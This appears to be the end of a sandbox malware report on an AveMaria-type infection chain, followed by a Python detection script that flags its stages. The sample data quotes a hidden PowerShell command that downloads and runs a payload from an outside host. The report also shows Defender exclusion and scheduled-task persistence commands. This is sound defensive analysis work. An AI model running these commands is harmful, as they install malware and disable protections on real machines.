                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
                    Imagebase:0x21cc0000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET

                    Target ID:32
                    Start time:08:14:09
                    Start date:23/09/2022
                    Path:C:\Windows\SysWOW64\schtasks.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
                    Imagebase:0x560000
                    File size:179712 bytes
                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:34
                    Start time:08:14:13
                    Start date:23/09/2022
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Imagebase:0x1020000
                    File size:261944 bytes
                    MD5 hash:7FB523211C53D4AB3213874451A928AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:35
                    Start time:08:14:22
                    Start date:23/09/2022
                    Path:C:\Windows\System32\verclsid.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Imagebase:0xffa70000
                    File size:11776 bytes
                    MD5 hash:3796AE13F680D9239210513EDA590E86
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    Target ID:36
                    Start time:08:14:23
                    Start date:23/09/2022
                    Path:C:\Windows\System32\notepad.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
                    Imagebase:0xfff60000
                    File size:193536 bytes
                    MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language

                    No disassembly
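The process records above show the full chain in command lines alone: a hidden, policy-bypassing PowerShell download cradle (Target 19), an Add-MpPreference exclusion for a path under AppData (22, 30), schtasks importing a task from a temp XML (24, 32), MSBuild.exe started with no arguments as the injection host that carries the AveMaria Yara hits (17, 26, 34), and a dropped binary named explorer.exe running from AppData\Roaming (20, 29). The following is an added hunting example, not part of the Joe Sandbox report and not Joe Security's code: it parses the "Target ID" blocks in the layout used above and applies one rule per stage. The rule names, the user-writable path list and the injection-host list are this example's own assumptions; the sample records are copied from the report, only the selection is constructed.

```python
"""Added hunting example; not part of the Joe Sandbox report.  Re-implements, over
the "Target ID" process records above, the checks behind several of the report's
signatures.  Rule names and the path heuristics are this example's own choices."""
import re
from dataclasses import dataclass

# Sample input: records copied verbatim from the report (Target IDs 19, 20, 22,
# 24, 26 and 35); only the selection is constructed here.
SAMPLE = r"""
Target ID:19
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')

Target ID:20
Path:C:\Users\user\AppData\Roaming\explorer.exe
Commandline:C:\Users\user\AppData\Roaming\explorer.exe

Target ID:22
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe

Target ID:24
Path:C:\Windows\SysWOW64\schtasks.exe
Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp

Target ID:26
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Target ID:35
Path:C:\Windows\System32\verclsid.exe
Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
"""

@dataclass
class Proc:
    target_id: int
    path: str
    cmdline: str

def parse_report(text):
    """Turn the report's blank-line-separated key:value blocks into Proc records."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        kv = dict(line.strip().partition(":")[::2] for line in block.splitlines())
        if "Target ID" in kv:
            procs.append(Proc(int(kv["Target ID"]), kv.get("Path", ""), kv.get("Commandline", "")))
    return procs

def basename(path):
    return path.rsplit("\\", 1)[-1].strip('"').lower()

def args_of(p):
    """Command-line text after the image name; tolerates the stray quotes the sandbox logged."""
    cl = p.cmdline.strip()
    m = re.match(r'"([^"]+)"|(\S+?\.exe)"?', cl, re.I)
    return cl[m.end():].strip() if m else cl

# Heuristic lists (assumptions of this example, not taken from the report).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
SYSTEM_NAMES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
INJECTION_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "aspnet_compiler.exe"}

def powershell_download_cradle(p):
    """A download primitive combined with a hidden window or an execution-policy bypass."""
    a = args_of(p)
    return (basename(p.path) == "powershell.exe"
            and bool(re.search(r"(?i)DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", a))
            and bool(re.search(r"(?i)-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-enc", a)))

def defender_exclusion_user_writable(p):
    """Add-MpPreference exclusion that points at a user-writable directory."""
    m = re.search(r'(?i)Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+"?([^"]+)', args_of(p))
    return bool(m and USER_WRITABLE.search(m.group(2)))

def schtask_from_temp_xml(p):
    """schtasks /Create importing its task definition from a Temp directory."""
    m = re.search(r'(?i)/create\b.*?/xml\s+"?([^"]+)', args_of(p))
    return basename(p.path) == "schtasks.exe" and bool(m and re.search(r"(?i)\\Temp\\", m.group(1)))

def injection_host_no_args(p):
    """A .NET build/registration utility started with no arguments does no real work;
    it is a classic hollowing target (cf. the AveMaria Yara hits inside MSBuild.exe above)."""
    return basename(p.path) in INJECTION_HOSTS and args_of(p) == ""

def system_binary_name_outside_windows(p):
    """A well-known system binary name running from outside the Windows directory."""
    return basename(p.path) in SYSTEM_NAMES and not re.match(r"(?i)[a-z]:\\windows\\", p.path)

RULES = [powershell_download_cradle, defender_exclusion_user_writable, schtask_from_temp_xml,
         injection_host_no_args, system_binary_name_outside_windows]

def evaluate(procs):
    """Map each Target ID to the names of the rules it trips."""
    return {p.target_id: [r.__name__ for r in RULES if r(p)] for p in procs}

if __name__ == "__main__":
    for tid, names in evaluate(parse_report(SAMPLE)).items():
        print(f"Target {tid}: {', '.join(names) or 'no hits'}")
```

Run stand-alone, it reports one rule per malicious record and no hits for the benign verclsid.exe control (Target 35). The rules deliberately key on the image basename plus argument content rather than on the full path, because the report shows the same command line logged under both System32 and SysWOW64 paths for the 32-bit PowerShell and schtasks instances; a rule anchored on `C:\Windows\System32\` would miss the WOW64-redirected copies.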